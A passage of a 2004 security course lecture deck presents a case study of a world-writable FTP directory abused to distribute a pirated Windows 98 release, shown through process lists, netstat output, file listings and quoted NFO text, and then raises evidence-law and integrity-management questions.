/tmp (mount_mfs)root 51 0.0 0.1 268 296 ?? Ss Mon01PM 0:02.92 gettyd -sroot 62 0.0 0.1 160 340 ?? Ss Mon01PM 1:19.11 syslogddaemon 65 0.0 0.1 112 184 ?? Ss Mon01PM 0:01.36 portmaproot 72 0.0 0.1 216 300 ?? Ss Mon01PM 0:01.34 mountdroot 74 0.0 0.1 144 288 ?? Is Mon01PM 0:00.01 nfsd-master (nfsd)root 76 0.0 0.0 76 100 ?? I Mon01PM 0:00.00 nfsd-server (nfsd)root 77 0.0 0.0 76 100 ?? I Mon01PM 0:00.04 nfsd-server (nfsd)root 78 0.0 0.0 76 100 ?? I Mon01PM 0:00.00 nfsd-server (nfsd)root 79 0.0 0.0 76 100 ?? I Mon01PM 0:00.00 nfsd-server (nfsd)root 80 0.0 0.0 76 100 ?? I Mon01PM 0:00.00 nfsd-server (nfsd)
![Page 62: CSCI E-170: November 30, 2004 Administrivia Federal Rules of Evidence Logging Integrity Management](https://reader035.vdocuments.us/reader035/viewer/2022062802/56814496550346895db1379b/html5/thumbnails/62.jpg)
MRTG reveals a problem…
Something is eating a lot of outgoing bandwidth…
BLUE is transmitted data
GREEN is received data
![Page 63: CSCI E-170: November 30, 2004 Administrivia Federal Rules of Evidence Logging Integrity Management](https://reader035.vdocuments.us/reader035/viewer/2022062802/56814496550346895db1379b/html5/thumbnails/63.jpg)
Process list shows a problem far down from the top…ftp 1471 0.0 0.2 740 496 ?? I 12:28PM 0:13.88
ds9.kulnet.kuleuven.ac.be: anonymous/[email protected]: RETR pwa98cbl.zip\r\n (ftpd)
ftp 1750 0.0 0.2 752 504 ?? S 12:32PM 0:12.79 ds9.kulnet.kuleuven.ac.be: anonymous/guest@: RETR pwa98cbj.zip\r\n (ftpd)
ftp 6982 0.0 0.2 288 480 ?? S 1:20PM 0:17.21 142.194.48.68: anonymous/getright@: RETR /simson/open/nothing_here/this_site_sucks/pwa98cbg.zip\r\n (ftpd)
ftp 10062 0.0 0.2 288 480 ?? S 1:53PM 0:00.27 cmodem85.lancite.net: anonymous/getright@: RETR /simson/open/ /calibreX/Win98.Final-PWA/pwa98cbf.zip\r\n (ftpd)
ftp 10088 0.0 0.2 288 480 ?? S 1:54PM 0:00.27 cmodem85.lancite.net: anonymous/getright@: RETR /simson/open/ /calibreX/Win98.Final-PWA/pwa98cbe.zip\r\n (ftpd)
ftp 10125 0.0 0.2 288 480 ?? S 1:54PM 0:00.28 cmodem85.lancite.net: anonymous/getright@: RETR /simson/open/ /calibreX/Win98.Final-PWA/pwa98cbd.zip\r\n (ftpd)
ftp 10251 0.0 0.2 288 480 ?? S 1:55PM 0:00.28 cmodem85.lancite.net: anonymous/getright@: RETR /simson/open/ /calibreX/Win98.Final-PWA/pwa98cbc.zip\r\n (ftpd)
Total simultaneous FTP transfers: 106
![Page 64: CSCI E-170: November 30, 2004 Administrivia Federal Rules of Evidence Logging Integrity Management](https://reader035.vdocuments.us/reader035/viewer/2022062802/56814496550346895db1379b/html5/thumbnails/64.jpg)
Netstat reveals further information…walden: {424} % more netstat-list Active Internet connections (including servers)Proto Recv-Q Send-Q Local Address Foreign Address (state)tcp 0 0 VINEYARD.NET.http a2p09.capcon.net.1203 SYN_RCVDtcp 0 0 VINEYARD.NET.http DSY4.VINEYARD.NE.1406 SYN_RCVDtcp 0 0 VINEYARD.NET.pop ASY5.VINEYARD.NE.2117 ESTABLISHEDtcp 0 1513 VINEYARD.NET.http 207.112.204.161.1570 FIN_WAIT_1tcp 0 8500 VINEYARD.NET.http srry01m05-128.bc.1505 ESTABLISHEDtcp 0 7168 VINEYARD.NET.http hd62-160.hil.com.2033 ESTABLISHEDtcp 0 8192 VINEYARD.NET.http 208.232.119.2.4125 ESTABLISHEDtcp 0 7552 VINEYARD.NET.20 hades.osc.epsilo.2943 ESTABLISHEDtcp 0 6952 VINEYARD.NET.http ww-tl01.proxy.ao.37672 ESTABLISHEDtcp 0 0 VINEYARD.NET.ftp dns1.bit-net.com.2268 ESTABLISHEDtcp 0 0 VINEYARD.NET.http cs206-32.student.1068 FIN_WAIT_2tcp 0 0 VINEYARD.NET.ftp spc-isp-mon-uas-.1037 ESTABLISHEDtcp 0 0 VINEYARD.NET.ftp kenny26.zip.com..1033 ESTABLISHEDtcp 0 0 VINEYARD.NET.http cs206-32.student.1067 FIN_WAIT_2tcp 0 0 VINEYARD.NET.ftp sladl3p24.ozemai.1676 ESTABLISHEDtcp 0 8760 VINEYARD.NET.pop ASY10.VINEYARD.N.1043 ESTABLISHEDtcp 0 0 VINEYARD.NET.http cs206-32.student.1065 FIN_WAIT_2tcp 0 7360 VINEYARD.NET.20 195.120.233.99.1819 ESTABLISHEDtcp 0 7340 VINEYARD.NET.1093 204.138.179.14.20 ESTABLISHED
![Page 65: CSCI E-170: November 30, 2004 Administrivia Federal Rules of Evidence Logging Integrity Management](https://reader035.vdocuments.us/reader035/viewer/2022062802/56814496550346895db1379b/html5/thumbnails/65.jpg)
We’ve been warezed!
ftp://vineyard.net/simson/open– World-writable FTP directory.
Two directories were created in open:– “ ” Three spaces– “nothing_here”
![Page 66: CSCI E-170: November 30, 2004 Administrivia Federal Rules of Evidence Logging Integrity Management](https://reader035.vdocuments.us/reader035/viewer/2022062802/56814496550346895db1379b/html5/thumbnails/66.jpg)
File list
./open/ /
./open/ /calibreX/
./open/ /calibreX/Win98.Final-PWA/
./open/ /calibreX/Win98.Final-PWA/Microsoft_WIndows98_FINAL_Retail_Full_Setup-PWA/
./open/ /calibreX/Win98.Final-PWA/Microsoft_WIndows98_FINAL_Retail_Full_Setup-PWA/PWA.NFO
./open/ /calibreX/Win98.Final-PWA/Microsoft_WIndows98_FINAL_Retail_Full_Setup-PWA/pwa98rfl1.zip
./open/ /calibreX/Win98.Final-PWA/file_id.diz
./open/ /calibreX/Win98.Final-PWA/PWA.NFO
./open/ /calibreX/Win98.Final-PWA/pwa98cba.zip
./open/ /calibreX/Win98.Final-PWA/pwa98cbd.good.zip
./open/ /calibreX/Win98.Final-PWA/pwa98cbb.zip
./open/ /calibreX/Win98.Final-PWA/pwa98cbc.zip
./open/ /calibreX/Win98.Final-PWA/pwa98cbd.zip
./open/ /calibreX/Win98.Final-PWA/pwa98cbe.zip
. . .
./open/nothing_here/
./open/nothing_here/ /
./open/nothing_here/ /pwa98cba.zip
![Page 67: CSCI E-170: November 30, 2004 Administrivia Federal Rules of Evidence Logging Integrity Management](https://reader035.vdocuments.us/reader035/viewer/2022062802/56814496550346895db1379b/html5/thumbnails/67.jpg)
/Microsoft_WIndows98_FINAL_Retail_Full_Setup-PWA/ Pirates With Attitudes
– Supplier: PWA Gods– Cracker: N/A– Packager: Murmillius– Protection: Serial Number– Type: Operating System– Disks: 21 x 5meg
![Page 68: CSCI E-170: November 30, 2004 Administrivia Federal Rules of Evidence Logging Integrity Management](https://reader035.vdocuments.us/reader035/viewer/2022062802/56814496550346895db1379b/html5/thumbnails/68.jpg)
PWA.NFO
Here it is: Windows '98 Final release - Retail Full Install!
While every other group will be bringing you so many good programs for this operating system, it's PWA that brings you the OS itself. It is fortunately for the user community that this is the case or you would probably have ended up with a ripped down release from some other lame group missing important system files like KRNL386.exe, because disklimits are more important nowadays to these people than a working release.
![Page 69: CSCI E-170: November 30, 2004 Administrivia Federal Rules of Evidence Logging Integrity Management](https://reader035.vdocuments.us/reader035/viewer/2022062802/56814496550346895db1379b/html5/thumbnails/69.jpg)
PWA.NFO … cont
You need to download the CABS and the RETAIL SETUP and unzip/unrar everything into one directory. The reason for this is that as soon as I get install keys, I can release RETAIL UPGRADE, OEM FULL and OEM UPGRADE versions and they will only take 4 meg each (the CAB zips are generic thruout all these versions, I can just package up the differences in seperate zips to save everyone space and time). You just unzip whichever one you want into the same directory as the generic CAB zips.
![Page 70: CSCI E-170: November 30, 2004 Administrivia Federal Rules of Evidence Logging Integrity Management](https://reader035.vdocuments.us/reader035/viewer/2022062802/56814496550346895db1379b/html5/thumbnails/70.jpg)
Question: Is PWA.NFO Hearsay?
![Page 71: CSCI E-170: November 30, 2004 Administrivia Federal Rules of Evidence Logging Integrity Management](https://reader035.vdocuments.us/reader035/viewer/2022062802/56814496550346895db1379b/html5/thumbnails/71.jpg)
What we did
Called Microsoft’s anti-piracy line.– Useless
Called FBI– Pretty useless as well.
Called Pace University– This got results…– …not necessarily the right results.
![Page 72: CSCI E-170: November 30, 2004 Administrivia Federal Rules of Evidence Logging Integrity Management](https://reader035.vdocuments.us/reader035/viewer/2022062802/56814496550346895db1379b/html5/thumbnails/72.jpg)
Integrity Management
What is it? How do you do it?
Tripwire Comparison Copies